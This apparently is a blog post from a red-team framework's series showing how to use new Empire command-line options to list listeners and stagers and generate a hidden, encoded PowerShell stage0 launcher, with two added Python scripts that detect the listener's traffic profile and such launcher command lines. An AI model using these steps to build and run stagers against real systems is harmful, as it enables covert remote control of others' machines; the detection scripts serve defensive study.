This post is part of the ‘Empire Series’ with some background and an ongoing list of series posts [kept here].
Recently, an Empire user requested that we build a ‘standalone payload generator’, similar to msfvenom’s functionality. The motivation is to provide a scriptable capability that makes integration with other tools relatively easy. This short post will cover the newly integrated command line options for Empire which allow for the scripted generation of stagers.
To display the currently available options, run ./empire -h
# ./empire -h
usage: empire [-h] [--debug [DEBUG]] [-s [STAGER]]
              [-o [STAGER_OPTIONS [STAGER_OPTIONS ...]]] [-l [LISTENER]] [-v]

optional arguments:
  -h, --help            show this help message and exit
  --debug [DEBUG]       Debug level for output (default of 1).
  -s [STAGER], --stager [STAGER]
                        Specify a stager to generate. Lists all stagers if none is specified.
  -o [STAGER_OPTIONS [STAGER_OPTIONS ...]], --stager-options [STAGER_OPTIONS [STAGER_OPTIONS ...]]
                        Supply options to set for a stager in OPTION=VALUE format. Lists options if nothing is specified.
  -l [LISTENER], --listener [LISTENER]
                        Display listener options. Displays all listeners if nothing is specified.
  -v, --version         Display current Empire version.
To use Empire’s CLI, you need to have a listener already configured so that its settings are stored in the backend empire.db database. An ./empire instance doesn’t have to be running while you generate stagers (though it can be), but the command does need to be executed from the Empire installation directory that contains the configured listeners.
In order to display the active listeners, use ./empire -l
# ./empire -l

[*] Active listeners:

  ID    Name              Host                          Type     Delay/Jitter   KillDate    Redirect Target
  --    ----              ----                          -------  ------------   --------    ---------------
  1     test              http://192.168.52.142:8080    native   5/0.0
To display the configuration for a particular listener, use ./empire -l <listener_name>
# ./empire -l test

Listener Options:

  Name              Required    Value                              Description
  ----              --------    -------                            -----------
  KillDate          False                                          Date for the listener to exit (MM/dd/yyyy).
  Name              True        test                               Listener name.
  DefaultLostLimit  True        60                                 Number of missed checkins before exiting
  StagingKey        True        2c103f2c4ed1e59c0b4e2e01821770fa   Staging key for initial agent negotiation.
  Type              True        native                             Listener type (native, pivot, hop).
  ID                True        1                                  Listener ID.
  RedirectTarget    False                                          Listener target to redirect to for pivot/hop.
  DefaultDelay      True        5                                  Agent delay/reach back interval (in seconds).
  WorkingHours      False                                          Hours for the agent to operate (09:00-17:00).
  Host              True        http://192.168.52.139:8080         Hostname/IP for staging.
  CertPath          False                                          Certificate path for https listeners.
  DefaultJitter     True        0.0                                Jitter in agent reachback interval (0.0-1.0).
  DefaultProfile    True        /admin/get.php,/news.asp,/login/   Default communication profile for the agent.
                                process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Port              True        8080                               Port for the listener.
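The DefaultProfile value in that listing is what every agent for this listener will put on the wire, which makes it just as useful on the defensive side as on the offensive one. The script below is an added example, not code from this post or from Empire: it splits the displayed profile into its request URIs and its User-Agent (the "uri1,uri2,...|User-Agent" split is an assumption drawn from the displayed value) and matches both against a few constructed web-server log lines in combined log format, reporting which clients hit a profile URI with the profile User-Agent.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed: the DefaultProfile value exactly as the listener display above shows it.
# Splitting it as "uri1,uri2,...|User-Agent" is an assumption drawn from that value.
DEFAULT_PROFILE = (
    "/admin/get.php,/news.asp,/login/process.jsp|"
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
)

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2016:13:55:36 +0000] "GET /admin/get.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.7 - - [10/Oct/2016:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/49.0"
10.0.0.5 - - [10/Oct/2016:13:55:41 +0000] "POST /login/process.jsp HTTP/1.1" 200 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.9 - - [10/Oct/2016:13:56:02 +0000] "GET /news.asp?id=3 HTTP/1.1" 404 210 "-" "curl/7.47.0"
"""

# Combined log format: client, ident, user, [timestamp], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_profile(profile: str) -> Tuple[List[str], str]:
    """Split a profile string into its request URIs and its User-Agent."""
    uris, _, user_agent = profile.partition("|")
    return [u.strip() for u in uris.split(",") if u.strip()], user_agent.strip()


def match_log(log_text: str, profile: str = DEFAULT_PROFILE) -> List[Dict[str, object]]:
    """Return one record per log line whose URI or User-Agent matches the profile."""
    uris, ua = parse_profile(profile)
    uri_set = set(uris)
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        path = m.group("path").split("?", 1)[0]  # compare without the query string
        reasons = []
        if path in uri_set:
            reasons.append("profile_uri")
        if m.group("ua") == ua:
            reasons.append("profile_ua")
        if reasons:
            hits.append({"src": m.group("src"), "ts": m.group("ts"),
                         "path": path, "reasons": reasons})
    return hits


def sources_matching_both(hits: List[Dict[str, object]]) -> Set[str]:
    """Clients that requested a profile URI with the profile User-Agent: the strongest signal."""
    return {str(h["src"]) for h in hits if len(h["reasons"]) == 2}


if __name__ == "__main__":
    found = match_log(SAMPLE_LOG)
    for h in found:
        print(h["src"], h["path"], ",".join(h["reasons"]))
    print("sources matching URI and UA:", sorted(sources_matching_both(found)))
```

A URI-only or User-Agent-only match is weak evidence on its own (the paths are deliberately generic and the UA string is a common Internet Explorer 11 one), which is why the script separates the two reasons and only calls out clients that match both.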
If you want to display the available Empire stagers, use ./empire -s
# ./empire -s

Stagers:

  Name              Description
  ----              -----------
  ducky             Generates a ducky script that runes a one-liner stage0 launcher for Empire.
  hta               Generates an HTA (HyperText Application) For Internet Explorer
  launcher          Generates a one-liner stage0 launcher for Empire.
  macro             Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.
  launcher_bat      Generates a self-deleting .bat launcher for Empire.
  dll               Generate a PowerPick Reflective DLL to inject with stager code.
  launcher_vbs      Generates a .vbs launcher for Empire.
  stager            Generates a (stage1) key-negotiation stager for Empire.
  pth_wmis          Generates a pth-wmis launcher for Empire.
  war               Generates a Deployable War file.
  hop_php           Generates a hop.php redirector for an Empire listener.
To see the configurable options for a given stager, use ./empire -s <stager_name>
# ./empire -s launcher

Name: Launcher

Description:
  Generates a one-liner stage0 launcher for Empire.

Options:

  Name              Required    Value       Description
  ----              --------    -------     -----------
  ProxyCreds        False       default     Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  Base64            True        True        Switch. Base64 encode the output.
  Listener          True                    Listener to generate stager for.
  OutFile           False                   File to output launcher to, otherwise displayed on the screen.
  Proxy             False       default     Proxy to use for request (default, none, or other).
  UserAgent         False       default     User-agent string to use for the staging request (default, none, or other).
And finally, to generate a given stager, use the -o OPTION1=VALUE1 OPTION2=VALUE2 format. Be sure to note which options are required from the above configuration display.
# ./empire -s launcher -o Listener=test

powershell.exe -NoP -NonI -W Hidden -Enc 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
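The launcher printed above is a PowerShell one-liner with -NoP -NonI -W Hidden -Enc followed by a base64 blob, which is also the shape a defender can look for in process-creation logs. The script below is an added example, not code from this post or from Empire: it walks a few constructed command-line samples, allows for PowerShell's abbreviated parameter names (-NoP for -NoProfile, -W for -WindowStyle, -Enc for -EncodedCommand and so on), decodes the -EncodedCommand argument (base64 of UTF-16LE text) and flags the launcher-like combination. The encoded content in the samples is a harmless Write-Host built inside the script, and the "launcher_like" rule is a constructed one, not Empire's.

```python
import base64
from typing import Dict, List, Optional


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines as a process-creation log would record them.
# The encoded payloads are harmless one-liners built with encode_powershell, not stagers.
SAMPLE_EVENTS = [
    "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_powershell("Write-Host 'constructed sample'"),
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -Command Get-Process",
    "notepad.exe C:\\Users\\alice\\notes.txt",
    "PowerShell -nop -w hidden -encodedcommand " + encode_powershell("Get-Date"),
]


def matches_param(token: str, full_name: str, min_len: int) -> bool:
    """PowerShell accepts any unambiguous prefix of a parameter name (-NoP, -NonI, -W, -Enc),
    so compare the token against the full name as a prefix instead of one fixed spelling."""
    if not token.startswith("-"):
        return False
    prefix = token[1:].lower()
    return len(prefix) >= min_len and full_name.startswith(prefix)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Recover the script text from a base64(UTF-16LE) argument; None if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(cmdline: str) -> Optional[Dict[str, object]]:
    """Return a record for PowerShell invocations, None for anything else."""
    tokens = cmdline.split()
    if not tokens:
        return None
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    if exe not in ("powershell", "powershell.exe"):
        return None
    flags = set()
    hidden = False
    encoded = None
    for i, tok in enumerate(tokens[1:], start=1):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if matches_param(tok, "noprofile", 3):          # -NoP ... -NoProfile
            flags.add("noprofile")
        elif matches_param(tok, "noninteractive", 4):   # -NonI ... -NonInteractive
            flags.add("noninteractive")
        elif matches_param(tok, "windowstyle", 1):      # -W ... -WindowStyle
            flags.add("windowstyle")
            hidden = nxt is not None and nxt.lower() == "hidden"
        elif matches_param(tok, "encodedcommand", 1):   # -E ... -EncodedCommand
            flags.add("encodedcommand")
            encoded = nxt
    decoded = decode_encoded_command(encoded) if encoded else None
    # Constructed rule for the launcher shape shown above: hidden window, encoded
    # command, and at least one of the "quiet" switches.
    launcher_like = hidden and "encodedcommand" in flags and bool(flags & {"noprofile", "noninteractive"})
    return {"cmdline": cmdline, "flags": sorted(flags), "hidden": hidden,
            "decoded": decoded, "launcher_like": launcher_like}


def scan(events: List[str]) -> List[Dict[str, object]]:
    """Records for every event that matches the launcher-like rule."""
    return [r for r in (analyse(e) for e in events) if r and r["launcher_like"]]


if __name__ == "__main__":
    for rec in scan(SAMPLE_EVENTS):
        print("launcher-like:", rec["cmdline"][:60], "->", rec["decoded"])
```

Matching on parameter prefixes rather than the literal -NoP -NonI -W Hidden -Enc string matters because the same invocation can be spelled many ways and the one-liner is easy to reword; the decoded script text is what you actually want to look at, and the rule above only tells you which events are worth decoding.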
Have fun!